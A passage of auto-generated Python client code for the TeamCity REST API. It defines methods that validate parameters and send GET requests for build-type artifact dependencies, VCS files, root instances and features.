if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArtifactDependencies', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_build_types_with_http_info(self, **kwargs): # noqa: E501
"""get_build_types # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_build_types_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str locator:
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_build_types" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildTypes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_children_with_http_info(self, path, bt_locator, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_children_with_http_info(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'bt_locator', 'base_path', 'locator', 'fields', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_children`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_children`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_children`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest/children{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_children_alias_with_http_info(self, path, bt_locator, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_children_alias_with_http_info(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'bt_locator', 'base_path', 'locator', 'fields', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_children_alias`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_children_alias`") # noqa: E501
if 'path' in params and not re.search('(.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_children_alias`, must conform to the pattern `/(.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest/{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_content_with_http_info(self, path, bt_locator, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_content_with_http_info(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str bt_locator: (required)
:param str response_builder:
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'bt_locator', 'response_builder', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_content" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_content`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_content`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_content`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'response_builder' in params:
query_params.append(('responseBuilder', params['response_builder'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest/content{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_content_alias_with_http_info(self, path, bt_locator, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_content_alias_with_http_info(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str bt_locator: (required)
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'bt_locator', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_content_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_content_alias`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_content_alias`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_content_alias`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest/files{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_current_vcs_instances_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_current_vcs_instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_current_vcs_instances_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootInstances
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_current_vcs_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_current_vcs_instances`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcsRootInstances', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootInstances', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_current_vcs_instances_obsolete_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_current_vcs_instances_obsolete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_current_vcs_instances_obsolete_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootInstances
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_current_vcs_instances_obsolete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_current_vcs_instances_obsolete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-instances', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootInstances', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_example_new_project_description_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_example_new_project_description # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_example_new_project_description_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: NewBuildTypeDescription
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_example_new_project_description" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_example_new_project_description`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/example/newBuildTypeDescription', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NewBuildTypeDescription', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_example_new_project_description_compatibility_version1_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_example_new_project_description_compatibility_version1 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_example_new_project_description_compatibility_version1_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: NewBuildTypeDescription
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_example_new_project_description_compatibility_version1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_example_new_project_description_compatibility_version1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/newBuildTypeDescription', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NewBuildTypeDescription', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_feature_with_http_info(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""get_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_feature_with_http_info(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `get_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Feature', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_feature_parameter_with_http_info(self, bt_locator, feature_id, parameter_name, **kwargs): # noqa: E501
"""get_feature_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str parameter_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'parameter_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_feature_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature_parameter`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `get_feature_parameter`") # noqa: E501
# verify the required parameter 'parameter_name' is set
if ('parameter_name' not in params or
params['parameter_name'] is None):
raise ValueError("Missing the required parameter `parameter_name` when calling `get_feature_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
if 'parameter_name' in params:
if isinstance(params['parameter_name'], TeamCityObject):
path_params['parameterName'] = params['parameter_name'].locator_id
else:
path_params['parameterName'] = params['parameter_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters/{parameterName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_feature_parameters_with_http_info(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""get_feature_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_feature_parameters_with_http_info(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_feature_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature_parameters`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `get_feature_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_feature_setting_with_http_info(self, bt_locator, feature_id, name, **kwargs): # noqa: E501
"""get_feature_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_feature_setting_with_http_info(bt_locator, feature_id, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_feature_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature_setting`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `get_feature_setting`") # noqa: E501
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_feature_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_features_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_features # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_features_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: Features
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_features" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_features`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Features', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
